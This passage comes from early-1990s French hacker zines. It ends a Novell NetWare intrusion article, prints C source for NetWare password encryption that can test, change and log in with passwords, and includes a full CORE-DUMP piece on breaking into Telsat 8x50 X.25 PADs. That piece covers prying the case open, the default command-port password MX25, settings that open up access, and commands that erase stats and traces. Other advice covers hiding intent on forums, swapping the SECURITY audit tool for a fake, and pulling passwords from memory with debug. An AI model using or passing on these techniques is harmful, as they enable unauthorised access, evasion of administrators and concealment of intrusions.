utilit‚): - VOL$LOG.ERR : Informations sur quand le volume a ‚t‚ mont‚ et d‚mont‚ et les erreures qui se sont produites. - TTS$LOG.ERR : Indique quand le Transaction Tracking Service a ‚t‚ initialis‚ et d‚sinitialis‚ et les erreures eventuelles. Le forum Novell sur FIDO et le Netwire sur Compuserve sont trŠs bons, mais si vous posez une question evitez de faire comprendre que vous etes un hacker, la tournure de la phrase doit faire comprendre que vous etes un supervisor curieux, ou un nouveau user pas trŠs competent, etc Lisez l'article de The Butler dans Phrack 35. Il est interressant d'un point de vu utilisation du systŠme, mais d'un niveau trŠs faible. Lisez tous se que vous trouvez sur la securit‚ des LAN et le programmation Novell. Frequentez assiduement les board underground et faites des Text Search pour 'Novell'. Gardez votre compte secret (si vous devez le passer, ne le faites qu'a des gens en lequel vous avez une confiance absolue) et surtout restez discret: Ne cr‚‚s pas de nouveau compte, ne changez pas les PW des autres user, n'effacez rien, enfin generalement soyez un bon Hacker et vous garderez votre compte longtemps. Si vous desirez tenter un projet important sachez que SECURTIY est un prog supervisor qui detecte les comptes sans PW, les comptes au niveau SUPERVISOR, etc. Vous pourriez le remplacer par un prog qui fait semblant que tout va bien (Verifiez que votre prog a bien meme taille et meme date que le SECURITY d'origine). Je connais un 'hole' dans Novell Netware 2.12 que je n'ais jamais personnelement essay‚: Si vous avez access a un ordinateur logg‚ ou l'user est parti et il n'a pas fait grand chose aprŠs son login voici une technique pour trouver son PW: Lancez debug et faites: -s 0000 ffff "USER_ID" Notez les addressed et autour d'une de celle-ci doit se trouver le PW, normalement autour de l'offset 8A00 du segment que Debug prend par default. Finalement jouez beaucoup … DOOM 1.2 sur votre LAN car … 4 c'est un jeu superbe. Appendix B: Source code: ~~~~~~~~~~~~~~~~~~~~~~~~ Ce qui suit est un source C qui ne fonctionne pas tel quel mais qui a des fonctions superbes pour log, crypt, verify PW, etc. Regardez le bien car il est assez dense mais trŠs instructif. Il vient des Pays-Bas et je pense qu'il est l'oeuvre de Hack-Tic. Il y a une addresse email si vous voulez contactez l'auteur. #include #include #include #include #include /* !!!!!!!!!!!!!! I didn't compile this version, so it might not be ready to run, I just put together parts of different sources to get it all in on file. email itsme@utopia.hacktic.nl func & getnewlogkey are internal server functions used to generate logkeys decode & decodepa are internal server functions used to get new password from a set password call encryptp : create encrypted password from userid, and password getpassk : create login data from encrypted password & logkey encrypt3 : create change pw date from login data for old pw + encrypted new pw decodepa : recreate encrypted pw from change pw data + old login data */ #define MAXPWLEN 64 #define MAXNAMELEN 48 typedef unsigned char u_char; u_char tab0[256]= /* used by encrypt */ {/* 0 1 2 3 4 5 6 7 8 9 a b c d e f */ 0x7,0x8,0x0,0x8,0x6,0x4,0xE,0x4,0x5,0xC,0x1,0x7,0xB,0xF,0xA,0x8, 0xF,0x8,0xC,0xC,0x9,0x4,0x1,0xE,0x4,0x6,0x2,0x4,0x0,0xA,0xB,0x9, 0x2,0xF,0xB,0x1,0xD,0x2,0x1,0x9,0x5,0xE,0x7,0x0,0x0,0x2,0x6,0x6, 0x0,0x7,0x3,0x8,0x2,0x9,0x3,0xF,0x7,0xF,0xC,0xF,0x6,0x4,0xA,0x0, 0x2,0x3,0xA,0xB,0xD,0x8,0x3,0xA,0x1,0x7,0xC,0xF,0x1,0x8,0x9,0xD, 0x9,0x1,0x9,0x4,0xE,0x4,0xC,0x5,0x5,0xC,0x8,0xB,0x2,0x3,0x9,0xE, 0x7,0x7,0x6,0x9,0xE,0xF,0xC,0x8,0xD,0x1,0xA,0x6,0xE,0xD,0x0,0x7, 0x7,0xA,0x0,0x1,0xF,0x5,0x4,0xB,0x7,0xB,0xE,0xC,0x9,0x5,0xD,0x1, 0xB,0xD,0x1,0x3,0x5,0xD,0xE,0x6,0x3,0x0,0xB,0xB,0xF,0x3,0x6,0x4, 0x9,0xD,0xA,0x3,0x1,0x4,0x9,0x4,0x8,0x3,0xB,0xE,0x5,0x0,0x5,0x2, 0xC,0xB,0xD,0x5,0xD,0x5,0xD,0x2,0xD,0x9,0xA,0xC,0xA,0x0,0xB,0x3, 0x5,0x3,0x6,0x9,0x5,0x1,0xE,0xE,0x0,0xE,0x8,0x2,0xD,0x2,0x2,0x0, 0x4,0xF,0x8,0x5,0x9,0x6,0x8,0x6,0xB,0xA,0xB,0xF,0x0,0x7,0x2,0x8, 0xC,0x7,0x3,0xA,0x1,0x4,0x2,0x5,0xF,0x7,0xA,0xC,0xE,0x5,0x9,0x3, 0xE,0x7,0x1,0x2,0xE,0x1,0xF,0x4,0xA,0x6,0xC,0x6,0xF,0x4,0x3,0x0, 0xC,0x0,0x3,0x6,0xF,0x8,0x7,0xB,0x2,0xD,0xC,0x6,0xA,0xA,0x8,0xD }; u_char tab[32]= /* used by encrypt & encryptp */ { 0x48,0x93,0x46,0x67,0x98,0x3D,0xE6,0x8D,0xB7,0x10,0x7A,0x26,0x5A,0xB9,0xB1,0x35, 0x6B,0x0F,0xD5,0x70,0xAE,0xFB,0xAD,0x11,0xF4,0x47,0xDC,0xA7,0xEC,0xCF,0x50,0xC0 }; u_char tab1[8][2][16]= /* used by encrypt3 */ { /* 0 1 2 3 4 5 6 7 8 9 a b c d e f */ {{ 0xF,0x8,0x5,0x7,0xC,0x2,0xE,0x9,0x0,0x1,0x6,0xD,0x3,0x4,0xB,0xA}, { 0x2,0xC,0xE,0x6,0xF,0x0,0x1,0x8,0xD,0x3,0xA,0x4,0x9,0xB,0x5,0x7}}, {{ 0x5,0x2,0x9,0xF,0xC,0x4,0xD,0x0,0xE,0xA,0x6,0x8,0xB,0x1,0x3,0x7}, { 0xF,0xD,0x2,0x6,0x7,0x8,0x5,0x9,0x0,0x4,0xC,0x3,0x1,0xA,0xB,0xE}}, {{ 0x5,0xE,0x2,0xB,0xD,0xA,0x7,0x0,0x8,0x6,0x4,0x1,0xF,0xC,0x3,0x9}, { 0x8,0x2,0xF,0xA,0x5,0x9,0x6,0xC,0x0,0xB,0x1,0xD,0x7,0x3,0x4,0xE}}, {{ 0xE,0x8,0x0,0x9,0x4,0xB,0x2,0x7,0xC,0x3,0xA,0x5,0xD,0x1,0x6,0xF}, { 0x1,0x4,0x8,0xA,0xD,0xB,0x7,0xE,0x5,0xF,0x3,0x9,0x0,0x2,0x6,0xC}}, {{ 0x5,0x3,0xC,0x8,0xB,0x2,0xE,0xA,0x4,0x1,0xD,0x0,0x6,0x7,0xF,0x9}, { 0x6,0x0,0xB,0xE,0xD,0x4,0xC,0xF,0x7,0x2,0x8,0xA,0x1,0x5,0x3,0x9}}, {{ 0xB,0x5,0xA,0xE,0xF,0x1,0xC,0x0,0x6,0x4,0x2,0x9,0x3,0xD,0x7,0x8}, { 0x7,0x2,0xA,0x0,0xE,0x8,0xF,0x4,0xC,0xB,0x9,0x1,0x5,0xD,0x3,0x6}}, {{ 0x7,0x4,0xF,0x9,0x5,0x1,0xC,0xB,0x0,0x3,0x8,0xE,0x2,0xA,0x6,0xD}, { 0x9,0x4,0x8,0x0,0xA,0x3,0x1,0xC,0x5,0xF,0x7,0x2,0xB,0xE,0x6,0xD}}, {{ 0x9,0x5,0x4,0x7,0xE,0x8,0x3,0x1,0xD,0xB,0xC,0x2,0x0,0xF,0x6,0xA}, { 0x9,0xA,0xB,0xD,0x5,0x3,0xF,0x0,0x1,0xC,0x8,0x7,0x6,0x4,0xE,0x2}} }; u_char tab3[16]= /* used by encrypt3 */ { 0x3,0xE,0xF,0x2,0xD,0xC,0x4,0x5,0x9,0x6,0x0,0x1,0xB,0x7,0xA,0x8 }; u_char tab8[8][2][16]= /* used by decode */ { {{0x8,0x9,0x5,0xC,0xD,0x2,0xA,0x3,0x1,0x7,0xF,0xE,0x4,0xB,0x6,0x0}, {0x5,0x6,0x0,0x9,0xB,0xE,0x3,0xF,0x7,0xC,0xA,0xD,0x1,0x8,0x2,0x4}}, {{0x7,0xD,0x1,0xE,0x5,0x0,0xA,0xF,0xB,0x2,0x9,0xC,0x4,0x6,0x8,0x3}, {0x8,0xC,0x2,0xB,0x9,0x6,0x3,0x4,0x5,0x7,0xD,0xE,0xA,0x1,0xF,0x0}}, {{0x7,0xB,0x2,0xE,0xA,0x0,0x9,0x6,0x8,0xF,0x5,0x3,0xD,0x4,0x1,0xC}, {0x8,0xA,0x1,0xD,0xE,0x4,0x6,0xC,0x0,0x5,0x3,0x9,0x7,0xB,0xF,0x2}}, {{0x2,0xD,0x6,0x9,0x4,0xB,0xE,0x7,0x1,0x3,0xA,0x5,0x8,0xC,0x0,0xF}, {0xC,0x0,0xD,0xA,0x1,0x8,0xE,0x6,0x2,0xB,0x3,0x5,0xF,0x4,0x7,0x9}}, {{0xB,0x9,0x5,0x1,0x8,0x0,0xC,0xD,0x3,0xF,0x7,0x4,0x2,0xA,0x6,0xE}, {0x1,0xC,0x9,0xE,0x5,0xD,0x0,0x8,0xA,0xF,0xB,0x2,0x6,0x4,0x3,0x7}}, {{0x7,0x5,0xA,0xC,0x9,0x1,0x8,0xE,0xF,0xB,0x2,0x0,0x6,0xD,0x3,0x4}, {0x3,0xB,0x1,0xE,0x7,0xC,0xF,0x0,0x5,0xA,0x2,0x9,0x8,0xD,0x4,0x6}}, {{0x8,0x5,0xC,0x9,0x1,0x4,0xE,0x0,0xA,0x3,0xD,0x7,0x6,0xF,0xB,0x2}, {0x3,0x6,0xB,0x5,0x1,0x8,0xE,0xA,0x2,0x0,0x4,0xC,0x7,0xF,0xD,0x9}}, {{0xC,0x7,0xB,0x6,0x2,0x1,0xE,0x3,0x5,0x0,0xF,0x9,0xA,0x8,0x4,0xD}, {0x7,0x8,0xF,0x5,0xD,0x4,0xC,0xB,0xA,0x0,0x1,0x2,0x9,0x3,0xE,0x6}} }; u_char tab9[16]= /* used by decode */ { 0xA,0xB,0x3,0x0,0x6,0x7,0x9,0xD,0xF,0x8,0xE,0xC,0x5,0x4,0x1,0x2 }; struct tod { u_char curryear, currmont, currday , currhour, currminu, currseco, currweek; } tod; int zeroseed=0; int seed1=0,seed2=0; /* seed1 : *2 mod 947 -> cycle length 946 seed2 : *2 mod 941 -> cycle length 940 together : 946*940=889240=8* 111155 = 2^3*5*11*43*47 915 220 0 184 570 825 * 484 460 5102 * 945 2 6858 505 251 7936 191 563 20053 347 408 49641 317 626 50319 791 155 52249 91 286 59015 * 504 252 63514 3 938 74552 663 94 75630 932 109 82524 * 741 487 91346 * 476 468 104818 611 773 106975 *** 915 220 111155 */ u_char func(int c) { if (seed1==0) { seed1=(tod.currmont<<4) + tod.currseco; zeroseed++; } else seed1<<=1; if (seed1>=947) seed1-=947; if (seed2==0) { seed2=(tod.currday<<3) + tod.currminu; zeroseed++; } else seed2<<=1; if (seed2>=941) seed2-=941; return (((u_char *)&tod)[(seed1+seed2)%7] +seed1+seed2+c)&0xff; } int newlogkey(int c, u_char *buf) { u_char *p; int i; /* **** logkey[c] is a table indexed by connection number if (logkey[c]==0) { logkey[c]=salloc(8); if (logkey[c]==0) return(0x96); /* server out of memory */ } p=logkey[c]; */ p=buf; for (i=0 ; i<8 ; i++) *p++=func(c); /* memcpy(logkey[c],buf,8); */ return(0); } unsigned int iswap(unsigned int nr) { _AH = *((char *) &nr); _AL = *(((char *) &nr)+1); } unsigned long lswap(long l) { _DH = *((char *) &l); _DL = *(((char *) &l)+1); _AH = *(((char *) &l)+2); _AL = *(((char *) &l)+3); } void dump(u_char *p,int l) { int i; for (i=0 ; i>4; else c=buf[c/2]&0xf; if (j&1) dst[j/2]|=(c<<4); else dst[j/2]|=c; } memcpy(buf,dst,8); c=p[0]; for (j=0 ; j<7 ; j++) p[j]=(p[j]>>4)|(p[j+1]<<4); p[7]=(p[7]>>4)|(c<<4); for (j=0 ; j<8 ; j++) { c=buf[j]; buf[j] = p[j] ^ (tab8[j][0][c&0xf] | (tab8[j][1][c>>4] << 4)); } } memcpy(dst,buf,8); } /* * char p1[16] : old encrypted password * char p2[16] : change password data * char p3[16] : new encrypted password (result) */ void decodepa(u_char *p1, u_char *p2, u_char *p3) { decode(p1,p2,p3); decode(p1+8,p2+8,p3+8); } /* char p1[32] : password xored with ID and itself ... * char p2[16] : encrypted password (result) */ void encrypt(register u_char *p1, u_char *p2) /* changes both p1 & p2 */ { int j; int i; u_char a; u_char c=0; for (j=0 ; j<2 ; j++) for (i=0 ; i<32 ; i++) { a=(p1[(i+c)&0x1f] - tab[i]) ^ (p1[i]+c); c+=a; p1[i]=a; } memset(p2,0,16); for (i=0 ; i<32 ; i++) if (i&1) p2[i/2] |= tab0[p1[i]]<<4; else p2[i/2] |= tab0[p1[i]]; } /* char id[4] : UserID * char src[len] : unencrypted password * int len : length of unencrypted password * char dst[16] : encrypted password (result) */ void encryptp(long id, u_char *src, int len, u_char *dst) { u_char buf[32]; u_char *p; u_char *q=src; int i; for (p=q+len-1 ; *p--==0 && len ; len--) ; memset(buf,0,32); for ( ; len>=32 ; len-=32) for (i=0 ; i<32 ; q++, i++) buf[i] ^= *q; p=q; if (len>0) for (i=0 ; i<32 ; i++) { if (q+len==p) { p=q; buf[i]^=tab[i]; } else buf[i]^=*p++; } for (i=0 ; i<32 ; i++) buf[i] ^= ((u_char *)&id)[i&3]; encrypt(buf,dst); } /* char logkey[8] : (requested with int21,ax=e3, fn 17 from server) * char crpw[16] : encrypted password (with encryptp) * char dst[8] : login data (result) */ void getpassk(long *logkey, u_char *crpw, u_char *dst) { u_char buf[32]; int i,j; encryptp(logkey[0],crpw,16,buf); encryptp(logkey[1],crpw,16,buf+16); for (i=0, j=31 ; i<16 ; i++, j--) buf[i]^=buf[j]; for (i=0 , j=15 ; i<8 ; i++, j--) dst[i]=buf[i]^buf[j]; } /* char p1[8] : part of old encrypted pw * char p2[8] : part of new encrypted pw * char p3[8] : part of change pw data (result) */ void encrypt3(register u_char *p1, u_char *p2, u_char *p3) { register int j; u_char c; u_char buf[8]; int i; memcpy(buf,p2,8); for (i=0 ; i<16 ; i++) { for (j=0 ; j<8 ; j++) { c=buf[j]^p1[j]; buf[j]= tab1[j][0][c&15] | (tab1[j][1][c>>4] <<4); } c=p1[7]; for (j=7 ; j>0 ; j--) p1[j]=(p1[j]<<4) | (p1[j-1]>>4); p1[0]= (c>>4) | (p1[0]<<4); memset(p3,0,8); for (j=0 ; j<16 ; j++) { c= tab3[j]; c= (tab3[j]&1) ? (buf[c/2]>>4) : (buf[c/2]&0xf) ; p3[j/2] |= (j&1) ? (c<<4) : c ; } memcpy(buf,p3,8); } } int shreq(int f, u_char *req, int rl, u_char *ans, int al) { struct REGPACK r; r.r_cx=rl; r.r_dx=al; r.r_si=FP_OFF(req); r.r_di=FP_OFF(ans); r.r_ds=FP_SEG(req); r.r_es=FP_SEG(ans); r.r_ax=0xf200|f; intr(0x21,&r); return(r.r_ax&0xff); } int getlogkey(u_char *s) { u_char req[3]; req[0]=0; req[1]=1; req[2]=0x17; return(shreq(0x17,req,3,s,8)); } int getobjid(char *name, int type, long *id) { u_char req[MAXNAMELEN+6]; u_char rep[MAXNAMELEN+6]; int err; req[2]=0x35; *(int *)(req+3)=type; req[5]=strlen(name); strncpy((char *)req+6,name,MAXNAMELEN); req[0]=0; req[1]=req[5]+4; err=shreq(0x17,req,req[1]+2,rep,MAXNAMELEN+6); *id=*(long *)rep; return(err); } int setpwcrypt(u_char *oldpw, int type, char *name, u_char *newpw, int l) { u_char req[MAXNAMELEN+31]; /* 8+16(pw's) + 1 + 3(type+len) + 3(header) */ req[2]=0x4b; memcpy(req+3,oldpw,8); *(int *)(req+11)=type; req[13]=strlen(name); strncpy((char *)req+14,name,48); req[14+req[13]]=l; memcpy(req+15+req[13],newpw,16); req[0]=0; req[1]=29+req[13]; return(shreq(0x17,req,req[1]+2,req,0)); } setpw(char *name, int type, char *oldpw, char *newpw) { u_char req[8+MAXNAMELEN+2*MAXPWLEN]; int l=5; req[2]=0x40; *(int *)(req+3)=type; req[l++]=strlen(name); strncpy((char *)req+l,name,MAXNAMELEN); l+=req[l]; req[l++]=strlen(newpw); strncpy((char *)req+l,newpw,MAXPWLEN); l+=req[l]; req[l++]=strlen(oldpw); strncpy((char *)req+l,oldpw,MAXPWLEN); l+=req[l]; req[0]=l>>8; req[1]=l&0xff; return(shreq(0x17,req,l+2,req,0)); } int changepw(char *name, int type, char *oldpw, char *newpw) { u_char logkey[8]; long id; u_char oldcrpw[16]; u_char newcrpw[16]; int err; int l; if (getlogkey(logkey)==0) { err=getobjid(name,type,&id); if (err) return (err); encryptp(id,(u_char *)oldpw,strlen(oldpw),oldcrpw); encryptp(id,(u_char *)newpw,strlen(newpw),newcrpw); getpassk((long *)logkey,oldcrpw,logkey); encrypt3(oldcrpw,newcrpw,newcrpw); encrypt3(oldcrpw+8,newcrpw+8,newcrpw+8); l=((( min(63,strlen(newpw))^oldcrpw[0]^oldcrpw[1] )&0x7f)|0x40); return(setpwcrypt(logkey,type,name,newcrpw,l)); } else return(setpw(name,type,oldpw,newpw)); } int trypw(char *pw, int type, char *name) { u_char req[7+MAXNAMELEN+MAXPWLEN]; req[2]=0x3f; *(int *)(req+3)=type; req[5]=strlen(name); strncpy((char *)req+6,name,MAXNAMELEN); req[6+req[5]]=strlen(pw); strncpy((char *)req+7+req[5],pw,MAXPWLEN); req[0]=0; req[1]=5+req[5]+req[6+req[5]]; return(shreq(0x17,req,req[1]+2,req,0)); } int trypwcrypt(u_char *crpw, int type, char *name) { u_char req[14+MAXNAMELEN]; req[2]=0x4a; memcpy(req+3,crpw,8); *(int *)(req+11)=type; req[13]=strlen(name); strncpy((char *)req+14,name,MAXNAMELEN); req[0]=0; req[1]=12+req[13]; return(shreq(0x17,req,req[1]+2,req,0)); } int testpw(char *name, int type, char *pw) { u_char logkey[8]; long id; u_char crpw[16]; int err; if (getlogkey(logkey)==0) { err=getobjid(name,type,&id); if (err) return (err); encryptp(id,(u_char *)pw,strlen(pw),crpw); getpassk((long *)logkey,crpw,logkey); return(trypwcrypt(logkey,type,name)); } else return(trypw(name,type,pw)); } int logincrypt(u_char *crpw, int type, char *name) { u_char req[14+MAXNAMELEN]; req[2]=0x18; memcpy(req+3,crpw,8); *(int *)(req+11)=type; req[13]=strlen(name); strncpy((char *)req+14,name,MAXNAMELEN); req[0]=0; req[1]=12+req[13]; return(shreq(0x17,req,req[1]+2,req,0)); } int login(char *name, int type, char *pw) { u_char req[7+MAXNAMELEN+MAXPWLEN]; req[2]=0x14; *(int *)(req+3)=type; req[5]=strlen(name); strncpy((char *)req+6,name,MAXNAMELEN); req[6+req[5]]=strlen(pw); strncpy((char *)req+7+req[5],pw,MAXPWLEN); req[0]=0; req[1]=5+req[5]+req[6+req[5]]; return(shreq(0x17,req,req[1]+2,req,0)); } int dologin(char *name, int type, char *pw) { u_char logkey[8]; long id; u_char crpw[16]; int err; if (getlogkey(logkey)==0) { err=getobjid(name,type,&id); if (err) return (err); encryptp(id,(u_char *)pw,strlen(pw),crpw); getpassk((long *)logkey,crpw,logkey); return(logincrypt(logkey,type,name)); } else return(login(name,type,pw)); } int setconn(int c) { struct REGPACK r; r.r_ax=0xf000; /* set preferred connection nr */ r.r_dx=c+1; intr(0x21,&r); return(r.r_ax&0xff); } int scanobj(char *name, int *type, long *id, int *err) { u_char req[10+MAXNAMELEN]; /* int length * char type * long id (-1 for wildcard) * int type (-1 for wildcard) * char len * char objname[len] */ u_char rep[9+MAXNAMELEN]; /* long id 0 * int type 4 * char name[48] 6 * char object_flags 54 * char security_flags 55 * char more 56 */ int objlen=strlen(name); req[2]=0x37; /* scan object list */ *(long *)(req+3)=*id; *(int *)(req+7)=*type; req[9]=objlen; /* string : obj name */ strncpy((char *)req+10,name,MAXNAMELEN); req[0]=0; req[1]=8+objlen; *err=shreq(0x17, req, req[1]+2+(req[0]<<8), rep, 0x39); if (*err) return(0); strncpy(name,(char *)rep+6,MAXNAMELEN); *type=*(int *)(rep+4); *id=*(long *)rep; return(rep[56]); } void main(int argc, char **argv) { char pw[MAXPWLEN]; char newpw[MAXPWLEN]; int err; int i; err=setconn(0); if (err) printf("failed setconn : %02x\n",err); if (argc>3) { debug=atoi(argv[1]); argv++; argc--; } if (argc<3) { printf("Usage : nov F username\n"); printf(" F = t l s\n"); exit(1); } strupr(argv[2]); while (kbhit()) getch(); switch(argv[1][0]) { case 't': /* verifybinderyovbjectpassword */ strcpy(pw,strupr(getpass("enter pw : "))); do { err=testpw(argv[2],0x100,pw); printf("%02x",err); } while (argv[1][1] && !kbhit()); break; case 'l': /* loginbinderyobject */ strcpy(pw,strupr(getpass("enter pw : "))); do { err=dologin(argv[2],0x100,pw); printf("%02x",err); } while (argv[1][1] && !kbhit()); break; case 's': /* setbinderyobjectpassword */ strcpy(pw,strupr(getpass("enter old pw : "))); strcpy(newpw,strupr(getpass("enter new pw : "))); do { err=changepw(argv[2],0x100,pw,newpw); printf("%02x",err); } while (argv[1][1] && !kbhit()); break; } while (kbhit()) getch(); } Appendix C: Comment Novell crypte les PW: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Les versions avant la 2.15c transmettent les PW non crypt‚s au serveur qui les crypte lui-meme. Cette section s'occupe de l'aprŠs 2.15c. 1. Login vous demande le serveur (ou prends celui par default) et votre USER_ID. 2. Server/User_ID sont transmis au serveur et vous etes attach‚s … ce serveur. 3. Login envoit un LOGOUT NCP pour effacer toute autre connection que vous pouvez avoir deja avec ce serveur. 4. Login demande un votre OBJECT_ID et une cl‚ de login au serveur. 5. Le serveur genere une cl‚ 8 byte et l'envoit … Login. 6. Login demande votre PW. 7. Login crypte OBJECT_ID, cl‚ et PW pour faire un 16 byte PW value. [ A mon avis la cl‚ n'est pas utilis‚, le chiffrement se fait uniquement sur OBJECT_ID et PW qui sont connus … l'avance et, aussi … mon avis, ne changent pas. ] 8. Login crypte cette PW value avec la cl‚ … pour faire un 8 byte PW value et l'envoit au serveur. 9. Le serveur recupere la 16 byte PW value qu'il a stock‚ dans la Bindery et la crypte avec la meme cl‚ qu'il a envoy‚ … Login. Il compare ensuite les 2 8 byte PW values. Si ils sont identiques le PW doit etre bon. Appendix D: L'auteur: ~~~~~~~~~~~~~~~~~~~~~ Mon handle est ARSCENE et je n'ais pas d'email actuellement. Pour me contacter adressez vous au journal et ils me feront parvenir l'info. Voila, c'est tout. Merci de m'avoir lut et j'espere avoir l'occasion d'ecrire un autre article pour ce zine bientot. Bonne chance et bon Hacking... Arscene. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.5 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. (regardez la date!!!!) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP | Volume I | Issue 2 | Phile 4 | [NeurAlien] 01/09/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= . . . . . . ^ ^ ^ ^ ^ ^ /|\/^\/|\/^\/|\/^\/|\/^\/|\/^\/|\/^\ . _/ \_ . \ Telsat 8x50 / . _/ de \_ . \ SATELCOM / . _/ Par NeurAlien \_ . \ / \|/\_/\|/\_/\|/\_/\|/\_/\|/\_/\|/\_/ . . . . . . >Presentation: ============= Le Telsat 8x50 est un systˆme d'assemblage d‚ssassemblage de paquet pour terminaux asynchrones. Il permet de concentrer 4, 10 ou 16 terminaux sur une ligne x25: un simple PAD. Il permet aussi de dispatcher une liaison x25 sur divers liasons priv‚es vers divers ‚quipements. Ce serveur de terminaux est une "boite" de dimensions 39,4 x 11,4 x 35,6 cm. En dessous du boitier, il y a un panneau de controle mais pour y acceder, il faut la cl‚ Satelcom. Prenez alors une petite cuillere, limez son manche pour inverser l'arrondi du bout: __________... _________... / \ | =======> | \__________... /_________... (ou plus simplement un tournevis) Ainsi, pour ouvrir, enlevez les vis sur les 2 cot‚s de la boite et inserez la petite cuillere horizontalement dans les fentes le long de la rainure du milieu. Une fois ceci fait, relevez la partie contenante de la cuillere vers le haut... Le boitier s'ouvre. A partir d'ici, vous pouvez faire un reset du PAD. >Caracteristiques reseau: ======================== La capacit‚ de sous adressage du T8X50 se limite a 2 octets. Donc il y a 100 sous adresses possibles >Utilisations et commandes en local: =================================== Quand on se connecte sur un T8X50 en local, on recoit: Message d'accueil: La valeur generique du prompt x28 est: TELSAT 8X50 VOIE : XX (ou XX est le numero de voie) taille maximum: 32 Message bulletin: Pas de valeur generique. Taille maximum: 120 Prompt: La valeur generique du prompt x28 est: ==> Taille maximum: 16 Mais tous ces messages peuvent ˆtre modifi‚s. Normalement, quand vous vous connectez en local ou pseudo-local avec un modem sur ligne priv‚e, vous devez recevoir le premier message puis le prompt. Si cela n'arrive pas, il faut taper: . (return point return) ou . Quand on appelle un serveur en x28 et que l'on veut preciser une sous adresse, on utilise pour cela le caractere '/'. Par exemple, si l'on veut appeller la sous adresse 56 au numero 175020123, il faudra faire la demande comme ceci: 175020123/56 Quand on veut faire la meme chose en X121, on supprime le slash. (n'oubliez pas que le NUA en x121 ne doit pas depasser 15 caracteres) On peut indiquer un mot de passe ou des donnees utilisateur qui seront transmises dans le paquet d'appel. mot de passe: P exemple de commande a taper: 175020123P(TEST) ---> appel de 175020123 avec mot de passe TEST Apres le P, il n'y aura plus d'echo, donc, tout ce que l'utilisateur verra sera: ==> 175020123P donn‚es utilisateur: D exemple de commande … taper: 175020123D(HELLO) ---> appel de 175020123 avec donnee utilisateur HELLO On peut aussi effectuer des appels en PCV par la commande: R-1xxxxxxxx exemple de commande … taper: R-175020123 ---> appel de 175020123 en PCV. On peut appeler d'un groupe ferme d'abonne comme ceci: G xx-1xxxxxxxx o— xx est num‚rique. On peut aussi cumuler des commandes: R,Gxx-1xxxxxxxx >Acces … la Porte de commande: ============================= Pour acceder … la porte de commande, il y a trois maniŠres: 1/ Par la porte de commande physique: Elle se situe sur la voie 0. Il suffit de s'y connecter comme on s'y connecte d'habitude. Ensuite, le 8X50 demande un mot de passe qui est par defaut: MX25 2/ Par une voie quelconque du Telsat: Il suffit de taper au prompt ==> 00/99 ou /99 La on recoit le message: COM Il faut repondre par RETURN Ensuite on tape le mot de passe generique: MX25 3/ Par le x25: Il suffit d'appeler l'adresse du Telsat et la sous adresse 99: adresse telsat: 175 020 123 sous adresse: 99 17502012399 On recoit le message: COM on tape RETURN on donne le mot de passe generique: MX25 >Configuration optimale pour la plus grande communicabilit‚: =========================================================== >>>>>>>>>>Entrer dans le menu de configuration avant tout essai!!!!!!!! SELECTION 1 : VOIE/CHANNEL OPTION D'APPEL 1: tout sauf 32. (valeur combinee de 0 a 128 sauf 32) (0,1,2,4,8,16,64,128 et combinaison) (0==correct) 128 64 32 16 8 4 2 1 0 * * 0 * * * * * * SELECTION 5 : LIGNE x25 MOT DE PASSE: rien, effacer la valeur. (MX25 ou **** sont les valeurs … entrer) APPEL ENTRANT: La valeur doit etre impaire (PCV accepte) (9==correct) et sans la valeur 2. 32 16 8 4 2 1 * * * * 0 1 APPEL SORTANT: 32 16 8 4 2 1 * * 0 * 0 * (bit 1: 1: ne communique pas l'adresse demandeur) 0: lui communique TYPE DE NUI: valeur imp‚rative: 0 VALIDATION DU NUI: valeur imp‚rative si vous accedez en local ou pseudo local.: 0 SELECTION 8: Classe 1: la valeur ne doit pas etre 00 (valeur correcte==99) Classe 2: la valeur ne doit pas etre 00 ni 99 mais comprise entre 17 et 98 compris. Journal des evenements: valeur imperative lors de l'utilisation: 0 SELECTION 15: valeur 1: 0 cela permet de se connecter localement d'une voie sur une autre. SELECTION 16: Il est utile de lire toutes les entrees. (entrer 1) >Utilisation de la porte de commande: ==================================== Pour interdir l'acces a une voie: 2 Pour deconnecter une voie (==2 mais immediat): 3 Pour revalider l'acces a une voie (inverse de 2 et 3): 4 Pour deconnecter tout le monde et mettre la ligne hors service: 6 Remettre la ligne en service (impossible par reseau): 7 Pour effacer les stats et les traces: 9 Pour deconnecter tout le monde et rebooter a froid le pad: 10 Pour prendre les valeurs par defaut: 11 >Appel entrant sur un T8X50: =========================== quand on se connecte sur un 8X50 par le reseau X25, on recoit generalement: - Pour un appel normal: COM - Pour un appel en PCV: COM R - Pour un appel avec groupe ferme d'abonne: COM Gxx - Pour un appel avec groupe ferme d'abonne et acceptation du PCV: COM R Gxx >Protection par mot de passe en entr‚e: ====================================== Il est possible de prot‚ger le telsat 8x50 contre des intrusions ill‚gales en d‚finissant un mot de passe pour la ligne x.25. Ceci signifie que les demandes d'appel destin‚es au Telsat doivent etre dot‚es du mot de passe correct ins‚r‚ entre les octets 5 et 8 compris de la zone de donn‚es d'appel utilisateur de 16 octets. Si la methode de sous adressage de donn‚es utilisateur est valid‚e, le mot de passe ligne figurera entre les octets 7 et 10 compris. En general, l'utilisateur n'a aucun controle sur les octets 1 … 4. Si le demandeur n'inclut pas le mot de passe dans la zone appropri‚e, le 8x50 rejettera l'appel avec un code diagnostic ‚gal a 133. LIB DTE 133 >Protection par NUI en sortie: ============================= Il est possible aussi d'associer … des NUI des NUA qui seront automatiquement appel‚s si l'utilisateur entre le bon NUI. Si le NUI n'est pas integre a la demande d'appel, le code de diagnotic sera ‚gal … 139 (mot de passe NUI obligatoire et requis) --> LIB DTE 139 Si le NUI est faux, le code de diagnostic est ‚gal … 140 (mot de passe NUI invalide) --> LIB DTE 140 Mais attention, si le PAD n'a pas ete configure d'une facon correcte, le NUI peut alors 